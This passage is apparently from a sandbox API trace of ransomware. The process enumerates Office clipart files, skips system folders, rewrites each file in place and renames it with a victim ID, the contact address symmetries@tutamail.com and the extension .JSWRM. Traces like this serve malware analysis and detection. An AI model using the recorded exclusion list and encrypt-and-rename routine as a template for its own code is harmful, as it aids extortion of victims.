lstrcmpiW (lpString1="FD01074_.WMF", lpString2="windows") returned -1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="recovery") returned -1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="perflogs") returned -1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="documents and settings") returned 1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="system volume information") returned -1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="msocache") returned -1 [0077.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0077.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01074_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01074_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01074_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0077.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0077.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01074_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01074_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01074_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0077.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.682] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4634) returned 1 [0077.682] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1210) returned 0x205850 [0077.682] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1210, lpOverlapped=0x0) returned 1 [0077.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.684] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1210, lpOverlapped=0x0) returned 1 [0077.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.684] CloseHandle (hObject=0x314) returned 1 [0077.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0077.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0077.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0077.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0077.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0077.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0077.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.685] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x96c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01084_.WMF", cAlternateFileName="")) returned 1 [0077.685] lstrcmpiW (lpString1="FD01084_.WMF", lpString2=".") returned 1 [0077.685] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="..") returned 1 [0077.685] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="...") returned 1 [0077.685] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="windows") returned -1 [0077.685] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="recovery") returned -1 [0077.685] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="perflogs") returned -1 [0077.686] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="documents and settings") returned 1 [0077.686] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.686] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="system volume information") returned -1 [0077.686] lstrcmpiW (lpString1="FD01084_.WMF", lpString2="msocache") returned -1 [0077.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0077.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01084_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01084_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01084_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0077.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0077.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01084_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01084_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01084_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0077.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0077.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0077.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.686] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2412) returned 1 [0077.686] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x960) returned 0x20c6c0 [0077.686] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x960, lpOverlapped=0x0) returned 1 [0077.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.710] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x960, lpOverlapped=0x0) returned 1 [0077.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0077.710] CloseHandle (hObject=0x314) returned 1 [0077.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0077.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0077.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0077.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0077.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.711] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0077.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0077.712] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1378, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01176_.WMF", cAlternateFileName="")) returned 1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2=".") returned 1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="..") returned 1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="...") returned 1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="windows") returned -1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="recovery") returned -1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="perflogs") returned -1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="documents and settings") returned 1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="system volume information") returned -1 [0077.712] lstrcmpiW (lpString1="FD01176_.WMF", lpString2="msocache") returned -1 [0077.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0077.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01176_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0077.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0077.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01176_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0077.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0077.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0077.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0077.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4984) returned 1 [0077.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1370) returned 0x205850 [0077.713] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1370, lpOverlapped=0x0) returned 1 [0077.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.715] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1370, lpOverlapped=0x0) returned 1 [0077.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.715] CloseHandle (hObject=0x314) returned 1 [0077.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0077.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0077.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0077.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0077.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0077.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.715] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0077.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0077.716] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01191_.WMF", cAlternateFileName="")) returned 1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2=".") returned 1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="..") returned 1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="...") returned 1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="windows") returned -1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="recovery") returned -1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="perflogs") returned -1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="documents and settings") returned 1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="system volume information") returned -1 [0077.716] lstrcmpiW (lpString1="FD01191_.WMF", lpString2="msocache") returned -1 [0077.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0077.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01191_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0077.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0077.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01191_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0077.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) 